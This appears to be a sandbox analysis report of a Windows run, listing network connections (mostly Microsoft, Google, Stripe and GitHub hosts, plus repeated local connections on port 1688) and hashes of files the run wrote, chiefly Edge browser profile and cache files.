US 150.171.28.254:443 ax-ring.msedge.net tcp
US 8.8.8.8:53 141.128.123.92.in-addr.arpa udp
US 8.8.8.8:53 254.84.171.150.in-addr.arpa udp
US 150.171.22.254:443 ln-ring.msedge.net tcp
US 131.253.33.254:443 a-ring-fallback.msedge.net tcp
GB 2.22.249.155:443 ow1.res.office365.com tcp
US 8.8.8.8:53 155.249.22.2.in-addr.arpa udp
GB 23.213.251.133:443 cxcs.microsoft.net tcp
GB 92.123.128.141:443 www.bing.com tcp
US 131.253.33.254:443 a-ring-fallback.msedge.net tcp
US 52.113.196.254:443 teams-ring.msedge.net tcp
US 4.150.240.254:443 arm-ring.msedge.net tcp
US 150.171.69.254:443 mcr-ring.msedge.net tcp
US 13.107.138.254:443 spo-ring.msedge.net tcp
US 13.107.246.254:443 tring.clo.footprintdns.com tcp
US 8.8.8.8:53 254.246.107.13.in-addr.arpa udp
US 152.199.19.161:443 fp-vs-nocache.azureedge.net tcp
US 150.171.74.254:443 bx-ring.msedge.net tcp
US 152.199.19.161:443 fp-vs-nocache.azureedge.net tcp
US 8.8.8.8:53 209.143.182.52.in-addr.arpa udp
US 52.123.129.254:443 dual-s-ring.msedge.net tcp
US 172.202.65.254:443 arc-ring.msedge.net tcp
GB 92.123.128.156:443 www.bing.com tcp
US 8.8.8.8:53 r.bing.com udp
GB 92.123.128.187:443 r.bing.com tcp
GB 92.123.128.187:443 r.bing.com tcp
GB 92.123.128.157:443 www.bing.com tcp
GB 92.123.128.157:443 www.bing.com tcp
GB 3.10.14.187:443 theunitysoft.com tcp
GB 3.10.14.187:443 theunitysoft.com tcp
GB 3.10.14.187:443 theunitysoft.com tcp
GB 3.10.14.187:443 theunitysoft.com tcp
GB 3.10.14.187:443 theunitysoft.com tcp
GB 3.10.14.187:443 theunitysoft.com tcp
FR 3.165.113.122:443 widget.trustpilot.com tcp
FR 99.86.91.29:443 js.stripe.com tcp
US 8.8.8.8:53 invitejs.trustpilot.com udp
US 104.21.7.63:443 sw-themes.com tcp
US 104.21.7.63:443 sw-themes.com tcp
FR 52.222.149.7:443 invitejs.trustpilot.com tcp
FR 52.222.169.15:443 widgets.trustedshops.com tcp
US 8.8.8.8:53 29.91.86.99.in-addr.arpa udp
US 8.8.8.8:53 232.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 63.7.21.104.in-addr.arpa udp
US 8.8.8.8:53 7.149.222.52.in-addr.arpa udp
US 8.8.8.8:53 15.169.222.52.in-addr.arpa udp
IE 34.241.59.225:443 api.stripe.com tcp
US 150.171.28.10:443 bat.bing.com tcp
GB 142.250.187.196:443 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
FR 18.245.175.102:443 static.hotjar.com tcp
GB 142.250.187.226:443 googleads.g.doubleclick.net udp
GB 142.250.187.226:443 googleads.g.doubleclick.net tcp
GB 216.58.212.227:443 www.google.co.uk tcp
US 216.239.34.36:443 region1.analytics.google.com tcp
BE 142.250.110.156:443 stats.g.doubleclick.net tcp
BE 142.250.110.156:443 stats.g.doubleclick.net tcp
GB 216.58.212.227:443 www.google.co.uk tcp
GB 216.58.212.227:443 www.google.co.uk tcp
FR 18.164.52.40:443 script.hotjar.com tcp
FR 99.86.91.29:443 js.stripe.com tcp
US 3.165.148.44:443 cdn1.api.trustedshops.com tcp
US 54.186.23.98:443 r.stripe.com tcp
US 54.186.23.98:443 r.stripe.com tcp
US 54.186.23.98:443 r.stripe.com tcp
US 54.186.23.98:443 r.stripe.com tcp
IE 54.76.53.164:443 merchant-ui-api.stripe.com tcp
US 54.186.23.98:443 r.stripe.com tcp
US 216.239.34.36:443 region1.analytics.google.com udp
US 52.167.30.171:443 fpt2.microsoft.com tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 avatars.githubusercontent.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.108.133:443 avatars.githubusercontent.com tcp
US 185.199.108.133:443 avatars.githubusercontent.com tcp
US 185.199.108.133:443 avatars.githubusercontent.com tcp
US 185.199.108.133:443 avatars.githubusercontent.com tcp
US 140.82.112.21:443 collector.github.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 140.82.112.21:443 collector.github.com tcp
GB 20.26.156.210:443 api.github.com tcp
GB 20.26.156.216:443 codeload.github.com tcp
N/A 127.0.0.2:1688 tcp
US 172.67.164.214:80 getgreenshot.org tcp
US 172.67.164.214:443 getgreenshot.org tcp
N/A 127.0.0.2:1688 tcp
GB 23.213.251.133:443 cxcs.microsoft.net tcp
GB 92.123.128.141:443 www.bing.com tcp
GB 23.213.251.133:443 cxcs.microsoft.net tcp
GB 92.123.128.137:443 www.bing.com tcp
IE 52.109.76.144:443 odc.officeapps.live.com tcp
IE 52.109.76.144:443 odc.officeapps.live.com tcp
GB 95.101.143.34:443 tcp
US 13.107.246.254:443 t-ring-s.msedge.net tcp
US 13.107.138.254:443 spo-ring.msedge.net tcp
GB 23.213.251.133:443 cxcs.microsoft.net tcp
GB 92.123.128.161:443 www.bing.com tcp
N/A 127.0.0.2:1688 tcp
N/A 127.0.0.2:1688 tcp
N/A 127.0.0.2:1688 tcp
N/A 127.0.0.2:1688 tcp
US 150.171.84.254:443 p-ring.msedge.net tcp
US 4.150.240.254:443 arm-ring.msedge.net tcp
US 8.8.8.8:53 cxcs.microsoft.net udp
GB 23.213.251.133:443 cxcs.microsoft.net tcp
GB 92.123.128.161:443 www.bing.com tcp
US 150.171.28.254:443 ax-ring.msedge.net tcp
US 20.237.255.146:443 sjc22prdapp01-canary.netmon.azure.com tcp
GB 23.213.251.133:443 cxcs.microsoft.net tcp
GB 92.123.128.141:443 www.bing.com tcp
N/A 127.0.0.2:1688 tcp
US 8.8.8.8:53 s-ring.msedge.net udp
US 13.107.3.254:443 s-ring.msedge.net tcp
N/A 127.0.0.2:1688 tcp
US 8.8.8.8:53 254.3.107.13.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 9314124f4f0ad9f845a0d7906fd8dfd8
SHA1 0d4f67fb1a11453551514f230941bdd7ef95693c
SHA256 cbd58fa358e4b1851c3da2d279023c29eba66fb4d438c6e87e7ce5169ffb910e
SHA512 87b9060ca4942974bd8f95b8998df7b2702a3f4aba88c53b2e3423a532a75407070368f813a5bbc0251864b4eae47e015274a839999514386d23c8a526d05d85

\??\pipe\LOCAL\crashpad_3676_YMJZTNQEIDTESEEF

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e1544690d41d950f9c1358068301cfb5
SHA1 ae3ff81363fcbe33c419e49cabef61fb6837bffa
SHA256 53d69c9cc3c8aaf2c8b58ea6a2aa47c49c9ec11167dd9414cd9f4192f9978724
SHA512 1e4f1fe2877f4f947d33490e65898752488e48de34d61e197e4448127d6b1926888de80b62349d5a88b96140eed0a5b952ef4dd7ca318689f76e12630c9029da

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 6ab427e83ee238ad5110c17c6ff9f35d
SHA1 037eb697d38da4cec5b06ad57fb14de5002f2ca3
SHA256 17de68adf45194cdce2ab2f4efb3f97ca7b6aa1de6492c79c1877da6610aa2d3
SHA512 90d6e84c76efe44a5ad4ad1d034bbf854184d20d562c2ff0d8cf06c737c75cf7ae37f554b0855d7557ee2d81efff58838370b665256d4bd9c3fd592a8a908949

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7becf530ce8db86624c20f8f1e8ba9a7
SHA1 30d8a928e042a20cac976049f25d6e2bf07cf85f
SHA256 5705fa2384a5f0cc66eedcc91c28ce5800997864cae506d12b10202bf7bba8f7
SHA512 f4c81ebe4c8269ece534de04e94cea73aa0ee9a7bc4f6fd6997e9d6eb058177937bdd1ab1f1ca3d63fcf35b32ff9c0405f2a9a4ad19ad0f3e7ddd3ec82a08454

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 94b7d7fb7e7a3ef8a77277b57b2954f8
SHA1 4a5b7a2c3ee4c5dc120720edd4cd1d9d2d6473f0
SHA256 3279101970221246b170ae21b9cfd4beda21af5990b00e66114e497a071074de
SHA512 1d4c35866b12ea33ff4a0a45753aa4859e5e2fa229b7b647e62d597c634375996fc83703faad47a61bb1be82ecfdebff86384e85f2b33e361410447d22fdfbc3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\12486804-1518-477d-bf3a-daef67e4301c.down_data

MD5 5683c0028832cae4ef93ca39c8ac5029
SHA1 248755e4e1db552e0b6f8651b04ca6d1b31a86fb
SHA256 855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e
SHA512 aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini

MD5 c677ffcba53645996354b58f158f2467
SHA1 6ecf3288ffcd674fa49e7dcadc6194152d518474
SHA256 21681039fcdf55b0821aeaf4a22727cffef451043ea20b9e8d32c3c70ee522ca
SHA512 69f420c1360145238f47565ba6c75dfa81facb28b4888e4511f44cf8ceadb1c787ab3846d205b6d42bacc2fd2bfc8194980cbb7c7f3615c6c9f5c73bde59ad59

memory/340-126-0x00007FFA43FB0000-0x00007FFA43FC0000-memory.dmp

memory/340-128-0x00007FFA43FB0000-0x00007FFA43FC0000-memory.dmp

memory/340-130-0x00007FFA43FB0000-0x00007FFA43FC0000-memory.dmp

memory/340-129-0x00007FFA43FB0000-0x00007FFA43FC0000-memory.dmp

memory/340-127-0x00007FFA43FB0000-0x00007FFA43FC0000-memory.dmp

memory/340-131-0x00007FFA415F0000-0x00007FFA41600000-memory.dmp

memory/340-132-0x00007FFA415F0000-0x00007FFA41600000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

MD5 20c3d911d854a1ad3a23dd5c14cf46f5
SHA1 18c00753e7c69c9ac72d24105c26df3aeedf37dd
SHA256 3f0d92df73264f702acca21fc7528bdc54b9cbd5ce837174f43d23a898d6aaec
SHA512 fa97962a88e4387ebae245c1773104fb4059c6023222007b4636f8cd337edf41631470ffb2966bdf266ee5f8b334844bcf7e4fc836bf8c23f32506bb7b5585ab

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db

MD5 75cd2e9370a598ca3d9739f7099db9fa
SHA1 499633ac281f9dd7c414ed493b0b83b7a36d74a0
SHA256 22a06bc02e2687e819099eef304a89fae729cbc1440b9814361e42c349e45406
SHA512 9cd9d584869174d441db92afe813026bebac43d6b974b192591b6b652c0feb77b4421f21e47b7824a453e964c6a790a0bb5786857a134935a2b9b4a718dc9abb

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\odc.officeapps.live.com\FC08DE24-6982-4383-8DC9-F96DEE90B1CB

MD5 2f82426450332b558a61ae9ca551abd9
SHA1 abdbf8f8bdd7572bcdefbd1e0b7da8d3cf17144d
SHA256 57d6315a8f1f11aaa111a9956ddd0d560f791f757c379ed77bbb5a1b5b577f52
SHA512 dbc43dab6cbde98647c5a88cd508a1528ef79c030286cf82cb4cb03c4af81930ad1c3b2644ead9eceea27cd5772324f42a51f04f1693102254567205a6abf0b5

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\odc.officeapps.live.com\BA56246B-E8BF-402D-8F2A-144B027426F0

MD5 85ad173999ed440af6120f3b4fd436fa
SHA1 eebe3bae40b0c82db581b905e2a4c4a90055c9b3
SHA256 2fb3e7ca57b5ec8657ff2b909c74dee246e7ed2b30abd60dec96fc4fb88bd165
SHA512 3c506252a27bc4a3d718fc2ad89036850ee3c9d5fd79966fc5e28debe1844d96e8d2777e160e8537034129fd8109dff027bf5eb4a082c99d0db93730ec31427e

memory/340-302-0x00007FFA43FB0000-0x00007FFA43FC0000-memory.dmp

memory/340-305-0x00007FFA43FB0000-0x00007FFA43FC0000-memory.dmp

memory/340-304-0x00007FFA43FB0000-0x00007FFA43FC0000-memory.dmp

memory/340-303-0x00007FFA43FB0000-0x00007FFA43FC0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

MD5 b29bcf9cd0e55f93000b4bb265a9810b
SHA1 e662b8c98bd5eced29495dbe2a8f1930e3f714b8
SHA256 f53ab2877a33ef4dbde62f23f0cbfb572924a80a3921f47fc080d680107064b4
SHA512 e15f515e4177d38d6bb83a939a0a8f901ce64dffe45e635063161497d527fbddaf2b1261195fde90b72b4c3e64ac0a0500003faceffcc749471733c9e83eb011

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000003.log

MD5 224c263b451f148d0085893fcd9a4362
SHA1 639c93f6b0fe0dfa1445d5280f35b5b86bf83152
SHA256 9973edace5d82d771d84cb2d37748fdfb69a3035f5c6d07c69a216c49bc12abc
SHA512 98383c8fe3f6e7b17cfc1ac45c1bdda35c42ae25603ddf8dcb5550174b06e5e765f2c1107af221d1e1c47851726aab224eac229704460e38274c5218b083f960

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13375956196387213

MD5 3a9b3bc19d9e1cb155fb1236a6a451b3
SHA1 2333751bae8413fbf887a9a461b0d5fc3120f761
SHA256 68f39817b9936555b762b886712eadb3d50859d935db9cb42137f404c83e4454
SHA512 fd95fb14fc3e52d7d221f0f4190ce8e92c715335173b78d83080049aae77895d7ba5753b02b088ea71ba4fbf164fab7f77745e1f57e14dae0e2e4e450288d220

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

MD5 ad45579c14fed88d6de509776b276eab
SHA1 57e3dc768ac38a0cdc69f31a9b0a358121fd23f5
SHA256 fa4bbe4f97bde3eb469948709d44572125aacf71c3e7bc297fda846a1a098422
SHA512 54cd208764c41e6c3bd74c1c9f45c1f834a0befe9e98d3214ad45b4ded57e968067456593afc9504748e8f186f3aea4c171bb4f02a23914a5cb96742b6e94484

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

MD5 6b2e3a87ce8dc564deae825db2471cd9
SHA1 b63d936790b5b5fd1b24dcf4eac710514372c000
SHA256 082d006042e9fedc442be7fc825d1a7ed704fba1ea186588c7631dbc6a222fec
SHA512 890093b403cd88bf24cd4aeb2b005012ceb0999743a139d0784dfa3998d21ddcf87412643115633d31d3c0903c82eb9ef14e57e596c821bf30ecd1dd048404fa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

MD5 c257c588bd3bb49f0205114aac6a0ee8
SHA1 244953bdbb908480709d40835038dbc936076de0
SHA256 10118dd89adc3f0c4774612793054789148c60157e00b5a455b148f05944f144
SHA512 708ca133dad3013edffa311fcad74e8097090184a01ba9692a9e29c960a1abf54ef3d06cf29a5769e50196b5a5553ded6ac326b366e072525bb52173ad5c03b7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 a50dd3c3297300e953e05fac805df7ff
SHA1 b3ebf0968949aeda0e8ce60db734e66e13052dc7
SHA256 f947cafce480f6d61d031ebabd0302a968f80b4216640c58c582b03ed8e04911
SHA512 23f8e345ce12454b438ae84059de1f2945222977e7056467c749a56768a0ec70c9d4e184a789bc3fe162a903a5cc2f686f5684e442c854a80643ab4534ff338b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache

MD5 a9851aa4c3c8af2d1bd8834201b2ba51
SHA1 fa95986f7ebfac4aab3b261d3ed0a21b142e91fc
SHA256 e708be5e34097c8b4b6ecb50ead7705843d0dc4b0779b95ef57073d80f36c191
SHA512 41a1b4d650ff55b164f3db02c8440f044c4ec31d8ddbbbf56195d4e27473c6b1379dfad3581e16429650e2364791f5c19aae723efc11986bb986ef262538b818

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

MD5 f401be2207c57697bdd31604a152ff5d
SHA1 3b287ea3ce81e61229287d9434f0eacd5b24b70c
SHA256 b53c7bf400b5c983ea34f3d5b5ece18388ea698078e78219a88b146615d6ea47
SHA512 7cc7504f553868394f64d72eb3bce5951d223e861736f1408d8086764f35ae6bb755e314e5c8c608b2be9849e0f5e04961984283bc3dbb15e3b96498fc02c936

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

MD5 7ddec00daa0a3af3fcbfaa488ca7f9c4
SHA1 674ffa71893397ca1e0540e67233519c1e1f95d9
SHA256 ddb7724aeaa699c7061b3c97b0870170e1d1ab563e036b8bcf47bde6732a7c67
SHA512 814c07eb854731981a1cdc1286f8efbf74284125d4ea7a5cfbaae7668a97086f89528af8cf9a94a7013e1cce94cfb121b8c4528d5eaf479af2ab32dd22b3e86f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

MD5 fa1af62bdaf3c63591454d2631d5dd6d
SHA1 14fc1fc51a9b7ccab8f04c45d84442ed02eb9466
SHA256 00dd3c8077c2cca17ea9b94804490326ae6f43e6070d06b1516dfd5c4736d94d
SHA512 2c3184f563b9a9bff088114f0547f204ee1e0b864115366c86506215f42d7dbf161bc2534ccaee783e62cc01105edffc5f5dabf229da5ebd839c96af1d45de77

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e584c3381e9a9e619fc5105ab45dba0b
SHA1 98e5914b181c6a17d973ee03917785a457d72c66
SHA256 fa1949aaa7eef9097bb1e064471d38959f1b704c242c9937483a9440b6f244fd
SHA512 adac4de69b7710fb6c4543ab52f0b57e70103a7247eca11539bf42b229625ab5f7fe17063903cb3dd2b792960a74644fceafecdf45839c9448e1ed966157188e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0

MD5 7ad01606b3f21a72a507303fea07464a
SHA1 bcc5d788e9e2f275d7bf7e3ed1246b4bcfd6decf
SHA256 0798be6138b8126aff47dbcc13023b1b1fb354923b5c4fa0d214c79e635e969b
SHA512 36d566176c359e41dad4eb2924acdfd5c1d8cd831e7f20d752c0510a635c355417e32c282b4c81c7c5d43575c40f3afdc82cf1add3f064987d6b8ec786d73654

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1

MD5 de73c0598447ec8628eb00f96c713f81
SHA1 be35125aed69c195996a5a5f97ea812f7f545bfa
SHA256 40cb3996cea4c190dae91fd2cedd282aa600e6dde0c2632018eaf4fe0e58fdc8
SHA512 2c9965f5587e43cd5729eeebf6cb7fad662cf0f15895a10c3b6dc32a0c4051c399bfbbcd6df2598bb81442fe5aa2da68fc109dd6d270dc85625fc422409c47e7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

MD5 6b0627d4af4a2d1bd4aeb6d540e5e944
SHA1 8f2714b5a59914df1af49ea8030867b8b3bf17bc
SHA256 682aba58c2bf40427d69313b4f98956fe05aa4cefa4692e16146d5a33056878b
SHA512 1dad3f5c1f05ad6ca4680825b6da829f7cd997fab0bfd099e2f3e333fbfc37239a3e17424e8ba23ab75f1f3a693fe9e88355774757fe7e1871baefd4c76d1dad

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

MD5 9bf1d8ab73190187028b17ce1a6487d1
SHA1 1d1f6844c4158e6631716999fa399239237a3331
SHA256 923d3fa3df52e0a767debca0d6f4dc7a983f4ef319d24611bb9a68fc833645cb
SHA512 a7500a23924fa7a1bb637e69ac89e675c3232fe858b8264a160389755b22cc9960f13d2c7137be27c1e11cd0f780dfbf1837deef96662f8051ae0d576e0558d8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3

MD5 f47a41e5639cfba7130af1f1d433c6a5
SHA1 4a5a1970a3b58b0e64a4eaf339bb026193d8f080
SHA256 03c3e1ef4600553a8b7a398acc63bab90176c583efc8c2bcbac6a76adcf214c8
SHA512 d56a4f31bec0bee521d43795321c1da4c72e3601d16a94f2657715d1bf3f40deed98152018f1db258a5864e51f851798c3c53934802fdd4e253f3807a5a1057c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1

MD5 c6c9214af10a9b021d15ac9a727818c6
SHA1 fefb8858eb505bd6f60e84b24dd05f0a52c5d224
SHA256 0be4c582418b1d495e5a9568ea1fba6c8c765b29ad42747b6315486a07782485
SHA512 d0fa8072193f7fe41e3c6bcd4cec197f12925d22cfb7ff0368cde855de5b66d6a3e597a58179c0729763b6f2c1c688f5e475d0a12d080b47c7d75a75fbe55263

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0

MD5 b351465599b4df79a0c34485def008c1
SHA1 3b9031a4b84ff065176ed551efa2a9f3f9c62aab
SHA256 63adf51bd5f7d4c2bafe82526a9e338a0ae67d0374c37b6656a668c4e9ea5603
SHA512 c373ea279b6abd6fabf6083270cf264d660c8b4f5fbd3ba2e1e63d83d5adede0303753aee1dcb6feb5762e08be015669313936b01ee4f35a5bd418955f93d8ec

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13375956196143213

MD5 3ac3a20592b6facd78008edc0963d721
SHA1 4ea6cd314f124186e0a52173dfa1693acb515c5b
SHA256 20491d820d8ef873fb58aa07ac9fff806845f3af7f4deb8c23f7753511d57caa
SHA512 9284de2fbe5d1f073f11a2c1bf1f788888bde78e73c7da0a8f02e89c378447eea911b95af6f0802a9bf75adea93f8befa5298be54d3d459d09c1d8251bafc7cb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

MD5 8ada3f5b3a5a57d9c1b3affaf8ae4cc6
SHA1 35bc23fb9529bdd24a8b1d1b0a7a1fc34ba13757
SHA256 3d5fd34014a4bdb4fe6a3040d79fd388a8ab6b9a49512e304e5e8a5fab1eef41
SHA512 b59757626085cec78410fa1d69193995c2c99ad36fba501224bc6fe1ec27b90bfe2351556e1abfcc7fc603f120f895d947b52b02ba375ee010947783f3bbc5e1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt

MD5 49e590cce51514b4ac36f0457dff073f
SHA1 30b259df16cf8b9822142a9b45eacb030b5baead
SHA256 c4e818aee6fe53ef3743a392933d4d50e542f1855df5439d12135fab4776a76c
SHA512 c5571ed3aca82bdb8cf6626883809bbfd9043d762835c99f051498dc4655cbf1f1b41050459ad230f68cf473c9e2b96b80affffcca0d5470dc49dd3101ca24c5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 79888c3068a17722956d3c248d2fa2f6
SHA1 31c8e50c2f34be5bf141efbed437248f7088268c
SHA256 1ae22c30b23c02121a375f4fb7112f9690126999a9a20f588b18db4415a18915
SHA512 3bdfcfcdb70bd2976bc86c499109e497e38a4738c25d351348aed7be1b6f909aaa2ca61d7d4c859d10d176c45484b9b311ca529bcc1e273d1bcaf43794a1472f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 14e3e95df695f16fa4e9a67b3451fe24
SHA1 3a4b6eb1aaac5b82fe4b31696898899229cd499d
SHA256 44db724e917d922f8ce163c35ba179f162f2f9394e71526225464a8dd50848b4
SHA512 b31c9c998d8e9758be5d7e1a96256491f1e1138c3504b58b46fcf1b16c7af66949605053dddfac435acd52fe2369430d13fd0807dfd8afa4e3329a9e30c55a9c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

MD5 fb2f02c107cee2b4f2286d528d23b94e
SHA1 d76d6b684b7cfbe340e61734a7c197cc672b1af3
SHA256 925dd883d5a2eb44cf1f75e8d71346b98f14c4412a0ea0c350672384a0e83e7a
SHA512 be51d371b79f4cc1f860706207d5978d18660bf1dc0ca6706d43ca0375843ec924aa4a8ed44867661a77e3ec85e278c559ab6f6946cba4f43daf3854b838bb82

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

MD5 2e86a72f4e82614cd4842950d2e0a716
SHA1 d7b4ee0c9af735d098bff474632fc2c0113e0b9c
SHA256 c1334e604dbbffdf38e9e2f359938569afe25f7150d1c39c293469c1ee4f7b6f
SHA512 7a5fd3e3e89c5f8afca33b2d02e5440934e5186b9fa6367436e8d20ad42b211579225e73e3a685e5e763fa3f907fc4632b9425e8bd6d6f07c5c986b6556d47b1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

MD5 c3c0eb5e044497577bec91b5970f6d30
SHA1 d833f81cf21f68d43ba64a6c28892945adc317a6
SHA256 eb48be34490ec9c4f9402b882166cd82cd317b51b2a49aae75cdf9ee035035eb
SHA512 83d3545a4ed9eed2d25f98c4c9f100ae0ac5e4bc8828dccadee38553b7633bb63222132df8ec09d32eb37d960accb76e7aab5719fc08cc0a4ef07b053f30cf38

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

MD5 56d57bc655526551f217536f19195495
SHA1 28b430886d1220855a805d78dc5d6414aeee6995
SHA256 f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4
SHA512 7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 0f71e89d9c27f488155cff38b1662577
SHA1 5f4f7d08f47765316c3151b5c7c4506063501c7b
SHA256 d4ab3542157805958ff1d98365225295d49f3e7ce332119efdc3065a72122753
SHA512 20c0ddc285a25f45f6ec9c394fbdfb8355ea33c00bda2242bdf43ebe5fc2477219c529ab88bbac297c97f55f9597f7f6590ef1813fcc90cc651ba3ee4a6c79bb

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9

MD5 8229785dfae2fc04fdc60d6ddb1e67c4
SHA1 d4e7b6ad7a7fef253db4628553475deac68fc74d
SHA256 9b366b349a146a7487fdca139bd38ab7e1d1f7787f050342ec7fac85bfd90d42
SHA512 8bb3c3b986177a9edb10a3a869333994f34704a21ead819e4489db96bfa9ea2f337bc5c2ca6e6bc743b2e17b7df91a28f0b5c1ee9a9719a565b973baed74b871

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9

MD5 7bf4cdfdf458a818bf9d41816e0350ae
SHA1 4449eac3231936d1aac4009c5d06a955bcf1081e
SHA256 3bff6ebf86a03846824de39225e9efb64d64c3f967ea33fc0a67d4fdc1f38b4d
SHA512 1db9da363b8627418f05b9d2de23f7d64f534ed3c50b856bb4c38eb623ff304a146e4c55f0a04ddc88a81cbe262b773dee3cde337cd8c0ece1f4089ab74968dd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 8c67731f0ec7366e23741c5ee2e5ed34
SHA1 8bd86a2839a0210b2edf0f2e5d1031e4b5500003
SHA256 b238914fe9e7aacde3c8378304b4c636e60dded5f1d387711a771d2f44090049
SHA512 0bac3297aac0162c661133d2282b89980c39ea4eb309f29657b01b485d574998ba0aabee0e2714f54533f4720f19540d302d3639a90e5661d65f98e74f0c84ca

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5e1c11.TMP

MD5 5f3a19a2f71ba88b1c27542567bcf7ed
SHA1 d9519f95e96452a45197b0079a7b27647b650812
SHA256 cce2a62cc21db8ab28c9cdbd0467847c3d6ae113708f43afbe135e8fd8b53e27
